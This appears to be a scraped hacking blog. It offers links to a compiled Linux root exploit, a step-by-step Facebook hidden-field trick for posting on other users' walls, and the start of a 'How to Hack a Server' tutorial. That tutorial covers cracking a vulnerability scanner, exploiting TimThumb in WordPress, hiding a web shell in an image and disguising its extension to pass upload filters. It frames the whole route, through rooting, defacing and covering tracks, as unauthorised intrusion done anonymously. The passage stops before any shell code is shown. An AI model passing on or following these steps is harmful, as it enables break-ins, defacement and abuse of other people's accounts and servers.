<span class="text_exposed_show" style="display: inline; line-height: 18px; text-align: left;"><span style="color: blue; font-family: 'Trebuchet MS', sans-serif;"><b>Some Of Them Are Compiled ;D</b></span></span><br /><span class="text_exposed_show" style="display: inline; line-height: 18px; text-align: left;"><span style="color: blue; font-family: 'Trebuchet MS', sans-serif;"><b>Download Compiled Mempodiper Exploit From Below</b></span></span><br /><span class="text_exposed_show" style="display: inline; line-height: 18px; text-align: left;"><span style="color: blue; font-family: 'Trebuchet MS', sans-serif;"><b><a href="https://www.facebook.com/ajax/messaging/attachment.php?attach_id=b4600151a097296c4f4e81a1473ad9d7&mid=mid.1377372913261%3Aef8092a45aceb01374&hash=AQBSkXqfw9fppt3N" style="-webkit-transition: all 0.2s ease-in-out; color: #2dcb73; outline: none; transition: all 0.2s ease-in-out;" target="_blank">HERE</a></b></span></span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="color: #141823; font-family: Georgia, 'Times New Roman', serif;"><span style="line-height: 18px;">======================================</span></span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="color: #141823; font-family: Georgia, 'Times New Roman', serif;"><span style="line-height: 18px;"><br /></span></span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="color: #141823; font-family: Georgia, 'Times New Roman', serif;"><span style="line-height: 18px;">Finally, below you'll get the link :D</span></span></div>
<div style="background-color: white; color: #4c4c4c; font-family: 'Open Sans', 'Helvetica Neue', Arial, Tahoma, sans-serif; font-size: 14px; line-height: 20px; text-align: center;">
<span style="color: #141823; font-family: Georgia, 'Times New Roman', serif; font-size: medium;"><span style="line-height: 18px;"><a href="http://www.mediafire.com/?8i4f6v5b343fe2s" style="-webkit-transition: all 0.2s ease-in-out; color: #2dcb73; outline: none; transition: all 0.2s ease-in-out;" target="_blank">Mediafire Link</a></span></span></div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com1tag:blogger.com,1999:blog-3265662506015756178.post-81279282620428508902013-09-04T22:51:00.001-07:002013-09-04T22:51:46.818-07:00Facebook exploit tutorial done By khalil<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: white; color: #333333; font-family: Arial, serif; font-size: 14px; line-height: 22.875px;"><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">Apparently this got patched before I could release this... I'll let it stay here so you can read something I made.</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">Sorry.</span><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><br style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /><span style="font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;">Hey guys! I recently saw a thread on another forum on how to do this exploit.<br /><br /><span style="font-size: medium;">What this exploit is about</span></span></span><br style="color: #333333; font-family: Arial, serif; font-size: 14px; line-height: 22.875px;" /><span style="background-color: white; color: #333333; font-family: Arial, serif; font-size: 14px; line-height: 22.875px;"><span style="font-family: Verdana, Arial, sans-serif; line-height: 18px;"><span style="font-size: medium;"><br /></span><span style="font-size: xx-small;">When you make a new status on Facebook, the default value of making a status is set to your profile. By changing a single value, you will be able to make a post on any wall you want.</span><br /><br /><span style="font-size: small;">Step 1</span><br /><span style="font-size: xx-small;">Open Facebook, write a status message but don't submit it.</span><br /><br /><span style="font-size: small;">Step 2</span><br /><span style="font-size: xx-small;">Open the profile you wish to make a post on, and copy the username, or ID, right after the facebook.com part. Example:</span><br /><br /><a href="http://www.facebook.com/zuck" style="color: #3366cc; font-size: 13px; text-decoration: none;" target="_blank">http://www.facebook.com/zuck</a><br /><span style="font-size: xx-small;">Copy zuck and put it after this URL: </span><a href="http://graph.facebook.com/" style="color: #3366cc; font-size: 13px; text-decoration: none;" target="_blank">http://graph.facebook.com/</a><br /><br /><a href="http://www.facebook.com/zuck" style="color: #3366cc; font-size: 13px; text-decoration: none;" target="_blank">http://www.facebook.com/zuck</a><span style="font-size: xx-small;"> -> </span><a href="http://graph.facebook.com/zuck" style="color: #3366cc; font-size: 13px; text-decoration: none;" target="_blank">http://graph.facebook.com/zuck</a><br /><br /><span style="font-size: small;">Step 3</span><br /><span style="font-size: xx-small;">Go back to your Facebook status, and open Google Developer (F12) or Inspect Element (Firefox) and click on the status, like this:</span><br /><span style="font-size: xx-small;"><img alt="[Image: 46uhJ.png]" border="0" height="73" src="http://puu.sh/46uhJ.png" style="border: none; padding: 2px;" width="400" /></span><br /><br /><span style="font-size: small;">Step 4</span><br /><span style="font-size: xx-small;">Scroll up, till you find an input-tag with name set to "xhpc_targetid". It looks like this:</span><br /><span style="font-size: xx-small;">&lt;input type="hidden" autocomplete="off" name="xhpc_targetid" value="12345"&gt;</span><br /><br /><span style="font-size: small;">Step 5</span><br /><span style="font-size: xx-small;">Go back to the graph.facebook.com tab you opened before, and copy the ID. It looks like this:</span><br /><span style="font-size: xx-small;"><img alt="[Image: 46unu.png]" border="0" src="http://puu.sh/46unu.png" style="border: none; padding: 2px;" /></span><br /><span style="font-size: xx-small;">In that case, the ID would be 4.</span><br /><br /><span style="font-size: small;">Step 6</span><br /><span style="font-size: xx-small;">Go back to your Facebook status, and replace the value="xxx" (from step 4) with your new ID. Example:</span><br /><br /><span style="font-size: xx-small;">&lt;input type="hidden" autocomplete="off" name="xhpc_targetid" value="12345"&gt;</span><br /><span style="font-size: xx-small;">changed to:</span><br /><span style="font-size: xx-small;">&lt;input type="hidden" autocomplete="off" name="xhpc_targetid" value="4"&gt;</span><br /><br /><span style="font-size: xx-small;">Once that is done, all you need to do now is press "Post". Your post will now be posted on the target's Facebook wall!</span><br /><br /><span style="font-size: xx-small;">Enjoy</span></span></span></div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-73920557709587232822013-09-04T22:50:00.001-07:002013-09-04T22:50:22.578-07:00How to Hack a Server [Shell Uploading, Rooting, Defacing, Covering your Tracks]<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="border: 0px; color: #cc0000; font-family: impact, Verdana, Arial, sans-serif; font-size: 2.8em; font-weight: normal; line-height: 1em; margin: 30px 0px 0px; padding: 0px 0px 9px; text-align: right; vertical-align: baseline;">
<span style="background-color: white; border: 0px; color: #3b3b3b; font-family: inherit; font-size: 34px; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">Tutorial on Web Hacking by Akatzbreaker</span></h2>
<h4 style="border: 0px; font-family: impact; font-size: 2.4em; font-weight: inherit; line-height: 1em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Web-Hacking is a huge topic that I could easily discuss for hours.</span></h4>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">When I had the idea to expand our Blog’s topics (not only Apple, iPhone, iPad, little tips on Mac and Windows etc….) and add more hacking information, tutorials etc….</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">So, today I decided to make a good start by creating this post-tutorial: <span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">How to Hack a Server</span></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">Everything you need to know….</strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span id="more-636" style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"></span></div>
<h3 style="border: 0px; color: #cc0000; font-family: impact, Verdana, Arial, sans-serif; font-size: 2.5em; font-weight: inherit; line-height: 1em; margin: 8px 0px 18px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Tools you need:</span></h3>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">- Backtrack (<a href="http://www.backtrack-linux.org/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="Backtrack Linux">Backtrack Website</a>)</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">- Firefox (get it from <a href="http://www.mozilla.org/en-US/firefox/new/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="Download Firefox | Mozilla">here….</a>) – Included in Backtrack and Ubuntu</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">- Netcat (Included in Backtrack) — If you are on other Linux environments get it from <a href="http://nmap.org/ncat/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="Netcat | Nmap.org">here….</a></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">- iCon2PHP (Get it from <a href="http://gnahackteam.wordpress.com/gnahackteam/icon2php/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="iCon2PHP | Created by Akatzbreaker">here….</a>)</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">- A good shell (iCon2PHP Archive includes three great shells)</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">- A good VPN or Tor (More explanation below…..)</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">- Acunetix Web Vulnerability Scanner (Search for a cracked version at <a href="http://www.hackforums.net/showthread.php?tid=2237088&highlight=Acunetix" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="Acunetix Web-Vulnerability Scanner | Cracked - Hackforums.net">Hackforums.net</a>)</span></div>
<h3 style="border: 0px; color: #cc0000; font-family: impact, Verdana, Arial, sans-serif; font-size: 2.5em; font-weight: inherit; line-height: 1em; margin: 8px 0px 18px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">About the Tools:</span></h3>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">Backtrack</strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">– Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking from a Linux system is better than from a Windows one, since most websites run on Linux servers.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<em style="background-color: white; border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(<span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">Just a little tip:</span> To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet)</em></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">Firefox</strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">– Firefox is the best browser for hacking. You can easily configure a proxy, and you can download millions of add-ons, among which you can find some for hacking. Find out more about “hacky” add-ons for Firefox <a href="http://gnahackteam.wordpress.com/2012/02/29/the-five-greatest-firefox-tools-for-hacking/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="The Five Greatest Firefox Tools for Hacking!">Here….</a></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">Netcat</strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">– Netcat is a powerful networking tool. You will need this to root the server….</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">iCon2PHP & Good Shells</strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">– iCon2PHP is a tool I created; you will use it when you upload the image to an image uploader at a forum or image-hosting service. The iCon2PHP archive contains some of the top shells available.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">Good VPN or TOR (Proxies are good too…)</strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">– While hacking you need to be anonymous, so that nobody can find you (even if you forget to delete the logs….). VPN stands for Virtual Private Network, and what it does is hide your IP and encrypt the data you send to and receive from the Internet. A good VPN solution for Windows machines is <a href="http://proxpn.com/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="ProXPN">ProXPN</a>. However, with VPN connections (especially on a free VPN account) your connection speed is really slow. So, I wouldn’t recommend a VPN unless you pay for a paid account.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;"><span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">What I would recommend</span> is <a href="http://www.torproject.org/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="TOR | Anonymity Online">Tor</a>. Tor can be used through its bundle, Vidalia, a great tool for Windows, Mac and Linux that routes you through proxies all over its worldwide network so as to keep you anonymous, changing these proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don’t want to pay for a paid VPN account.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Apart from Tor, simple proxies are good, but I <span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">wouldn’t recommend</span> them as much as I would Tor.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;"><strong>— If I listed the above options according to their reliability:</strong></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">1. Paid VPN Account at ProXPN</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">2. Tor</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">3. Free VPN Account at ProXPN</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">4. Proxy Connection</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">Acunetix Web Vulnerability Scanner</strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">– Acunetix is (maybe the best) vulnerability scanner. It scans for open ports, vulnerabilities and directory listings. During the scan it lists the vulnerabilities it finds, explains how a hacker could exploit each one and how to patch it, and also shows whether it is a small or a big vulnerability.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<em style="background-color: white; border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">The Consultant Edition (for unlimited websites) costs about $3000-7000.</em></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; text-align: center; vertical-align: baseline;">
<strong style="background-color: white;">____________________________________________________________</strong></div>
<h3 style="border: 0px; color: #cc0000; font-family: impact, Verdana, Arial, sans-serif; font-size: 2.5em; font-weight: inherit; line-height: 1em; margin: 8px 0px 18px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Starting the Main Tutorial:</span></h3>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">So, here is the route we will follow:</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">Find a Vulnerable Website -> Upload a c100 Shell <em style="border: 0px; font-family: inherit; font-weight: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(Hidden in an Image with iCon2PHP)</em> -> Rooting the Server -> Defacing the Website -> Covering your Tracks</strong></div>
<h4 style="border: 0px; font-family: impact; font-size: 2.4em; font-weight: inherit; line-height: 1em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-size: 29px; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">- - - Before we begin - - -</span></h4>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">-Boot to Backtrack</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">-Connect to your VPN or to Tor.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">-It would be good to read a complete guide to staying anonymous while hacking <a href="http://www.hackforums.net/showthread.php?tid=2145893" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="Hackforums.net">here…</a></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">-Open Firefox.</span></div>
<h4 style="border: 0px; font-family: impact; font-size: 2.4em; font-weight: inherit; line-height: 1em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-size: 29px; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">1. Finding a Vulnerable Website and Information about it:</span></h4>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Crack Acunetix (find a tutorial at Hackforums.net). Open it and scan the website (use the standard profile; don’t modify anything unless you know what you are doing). For this tutorial our website will be: <strong><a href="http://www.site.com/" rel="nofollow" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">http://www.site.com</a></strong> <em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(not very innovative, I know….)</em></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Let’s say we find a vulnerability where we can upload a remote file (our shell) and have access to the website’s files.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">OK. Now we have the site and the path where the vulnerability is. In our example let’s say it is here:</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.site.com/blog/wp-content/themes/theme_name/thumb.php" rel="nofollow" style="background-color: white; border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">http://www.site.com/blog/wp-content/themes/theme_name/thumb.php</a></em></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven’t updated to the latest version of TimThumb, an image-resizing script used on websites.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">OK. Acunetix should also mention the OS of the server. Let’s assume ours is a Unix/Linux system <em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(so that I can show you how to root it)</em>.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">For now, we don’t need anything more from Acunetix.</span></div>
<h4 style="border: 0px; font-family: impact; font-size: 2.4em; font-weight: inherit; line-height: 1em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-size: 29px; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">2. Uploading the shell:</span></h4>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;"><strong>Till now, we know:</strong></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">-The website’s blog has a huge vulnerability in <strong>TimThumb</strong>.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">-It is hosted on a <strong>Unix</strong> System.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Next, because the vulnerability is in an outdated TimThumb version, and TimThumb is a script that fetches and edits images, we need to upload the shell in place of an image.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Thus, download any image (I would recommend a small one) from Google Images. We don’t care what it shows.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;"><strong>Generate Output with iCon2PHP</strong></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Copy your Image and your Shell to the Folder that iCon2PHP is located.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Run the Program and follow the in-program instructions to build the ‘finalImage.php’.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">To avoid any errors while uploading, rename ‘finalImage.php’ to ‘image.php;.png’ <em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(instead of png, type the format your image was in: jpeg, jpg, gif….)</em>. This is exactly the same file, but <span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">it confuses the uploader into thinking that it actually is an image.</span></span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">iCon2PHP Terminal Output:</span></div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">[...]</span></div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Enter the Path of your Image: image.png<br />Please enter the path to the PHP: GnYshell.php</span></div>
